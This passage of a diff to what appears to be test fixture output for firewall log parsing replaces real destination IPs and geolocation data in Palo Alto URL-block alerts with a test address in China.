"tcp", "application": "ssl", @@ -2729,14 +2761,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767775983Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691741900Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -2759,26 +2791,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2794,14 +2828,14 @@ "port": 52999, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -2816,7 +2850,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:bzhUSIQYpz+jY7TA+j8UmFOdJ08=" + "community_id": "1:ZVehaLmF/+EShaJw/YID4C2vAek=" } }, "threat_category": "unknown", @@ -2861,8 +2895,8 @@ ], "network": { "community_id": [ - "1:SsYXkesHdCi9Tx1qsjfCIH8mHm4=", - "1:bzhUSIQYpz+jY7TA+j8UmFOdJ08=" + "1:GGkceDGdBTFH7NghXgGJekE3E/Q=", + "1:ZVehaLmF/+EShaJw/YID4C2vAek=" ], "transport": "tcp", "application": "ssl", @@ -2901,14 +2935,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767780094Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691746200Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -2931,26 +2965,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2966,14 +3002,14 @@ "port": 53001, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -2988,7 +3024,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:NRiTxPYsIvfOnUXhwuF5KPucNf8=" + "community_id": "1:sh19mSnccM57Tejs1XFa4RBfLBk=" } }, "threat_category": "unknown", @@ -3033,8 +3069,8 @@ ], "network": { "community_id": [ - "1:84WYKtahMlLwf+ZletWf/DNnE30=", - "1:NRiTxPYsIvfOnUXhwuF5KPucNf8=" + "1:41JadGG6xL4JI4SLComS6u8CFEE=", + "1:sh19mSnccM57Tejs1XFa4RBfLBk=" ], "transport": "tcp", "application": "ssl", @@ -3073,14 +3109,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767784173Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691751400Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -3103,26 +3139,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3138,14 +3176,14 @@ "port": 53002, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -3160,7 +3198,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:9noBCzeHKSZpuQWETkS7W5mOTT0=" + "community_id": "1:A4eXJ9RP6cag3i4lZitT6KUjkvU=" } }, "threat_category": "unknown", @@ -3205,8 +3243,8 @@ ], "network": { "community_id": [ - "1:X4Zvg9D/bP0EYECRSLna3za4r68=", - "1:9noBCzeHKSZpuQWETkS7W5mOTT0=" + "1:wucCQjxCnajGFPXkiFJxInK2F/E=", + "1:A4eXJ9RP6cag3i4lZitT6KUjkvU=" ], "transport": "tcp", "application": "ssl", @@ -3245,14 +3283,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767940552Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691757800Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -3275,26 +3313,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3310,14 +3350,14 @@ "port": 53003, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -3332,7 +3372,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:NQ3UU1pIt7hTJ2TYkbe6yjIVIsw=" + "community_id": "1:jkV0aA7YmsGvEx1Nsw8I6Wp4Fuo=" } }, "threat_category": "unknown", @@ -3377,8 +3417,8 @@ ], "network": { "community_id": [ - "1:greC2ffRfw5diAvjZvd+je5rhrk=", - "1:NQ3UU1pIt7hTJ2TYkbe6yjIVIsw=" + "1:waaV/9m4xZnrtSSeXWug8Q/F6y8=", + "1:jkV0aA7YmsGvEx1Nsw8I6Wp4Fuo=" ], "transport": "tcp", "application": "ssl", @@ -3417,14 +3457,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767955580Z", - "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691761900Z", + "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:38.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -3447,26 +3487,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.137.131" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 20940, + "number": 4837, "organization": { - "name": "Akamai International B.V." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.137.131" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3482,14 +3524,14 @@ "port": 53004, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.137.131,192.168.1.63,23.72.137.131,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,\"b.scorecardresearch.com/\",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,\"b.scorecardresearch.com/\",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.137.131" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -3504,7 +3546,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:pzcUv98hFdzW07/5bQ15jcEOAAM=" + "community_id": "1:8thKdEham83d9LtbvxFptMHz5g0=" } }, "threat_category": "unknown", @@ -3549,8 +3591,8 @@ ], "network": { "community_id": [ - "1:EcYXcH6rGmgtHGDCjUQcmM+hR0c=", - "1:pzcUv98hFdzW07/5bQ15jcEOAAM=" + "1:Y+Hllh666Eb09KOwoiC4xWQedM8=", + "1:8thKdEham83d9LtbvxFptMHz5g0=" ], "transport": "tcp", "application": "ssl", @@ -3589,14 +3631,14 @@ ], "ip": [ "192.168.15.224", - "23.72.137.131", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767968080Z", - "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,23.72.137.131,192.168.1.63,23.72.137.131,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,\"b.scorecardresearch.com/\",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691766900Z", + "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,\"b.scorecardresearch.com/\",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:38.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -3619,26 +3661,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3654,14 +3698,14 @@ "port": 53000, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -3676,7 +3720,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:iHNZW72XqbNDDHf4ziF4MHkPsq8=" + "community_id": "1:jjEgdpZKKcV2KA1l0e1qHB2Wkk0=" } }, "threat_category": "unknown", @@ -3721,8 +3765,8 @@ ], "network": { "community_id": [ - "1:OX20k3mW9JzBo4RmzVjTtvOawu4=", - "1:iHNZW72XqbNDDHf4ziF4MHkPsq8=" + "1:HIkN3gcLbbEYtuFCK3Riedx38SM=", + "1:jjEgdpZKKcV2KA1l0e1qHB2Wkk0=" ], "transport": "tcp", "application": "ssl", @@ -3761,14 +3805,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767972695Z", - "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691770900Z", + "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:38.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -3791,26 +3835,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3826,14 +3872,14 @@ "port": 53006, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -3848,7 +3894,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:WmnET8BZufXJpdVk04PIVGj+Kgk=" + "community_id": "1:0FqP8MVruPuvjAz59u+Gj/lzSGo=" } }, "threat_category": "unknown", @@ -3893,8 +3939,8 @@ ], "network": { "community_id": [ - "1:oWKucHrzLhzCpDmWJPLBELyMrzw=", - "1:WmnET8BZufXJpdVk04PIVGj+Kgk=" + "1:pL9yHPA7wjpnmTYscqPRL0Q5+xk=", + 